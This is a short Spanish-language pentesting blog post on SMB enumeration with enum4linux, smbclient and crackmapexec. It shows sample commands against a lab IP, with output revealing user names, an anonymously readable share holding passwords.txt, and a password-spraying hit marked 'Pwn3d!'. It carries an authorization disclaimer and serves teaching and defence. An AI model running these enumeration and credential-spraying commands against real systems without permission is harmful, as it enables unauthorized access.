~ / blog / pentesting
KALI

Enumeración SMB

SMB, el protocolo de archivos compartidos de Windows, filtra muchísima información.

enum4linux te lista usuarios, grupos y recursos compartidos. Con smbclient te conectas y navegas los shares; a veces encuentras archivos con contraseñas a la vista.

Y crackmapexec prueba credenciales contra toda la red de una: cuando ves Pwned, encontraste un acceso válido. Un SMB mal configurado es oro para un atacante.

# los comandos

kali@kali:~$ enum4linux -a 10.0.0.20copiar
[+] Users: administrator, jsmith, backup
[+] Share: shared Mapping: OK Listing: OK
kali@kali:~$ smbclient -L //10.0.0.20 -Ncopiar
Sharename Type
ADMIN$ Disk
shared Disk
kali@kali:~$ smbclient //10.0.0.20/shared -N -c 'ls'copiar
passwords.txt
backup.zip
kali@kali:~$ crackmapexec smb 10.0.0.20 -u users.txt -p 'Verano2026!'copiar
SMB 10.0.0.20 [+] jsmith:Verano2026! (Pwn3d!)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.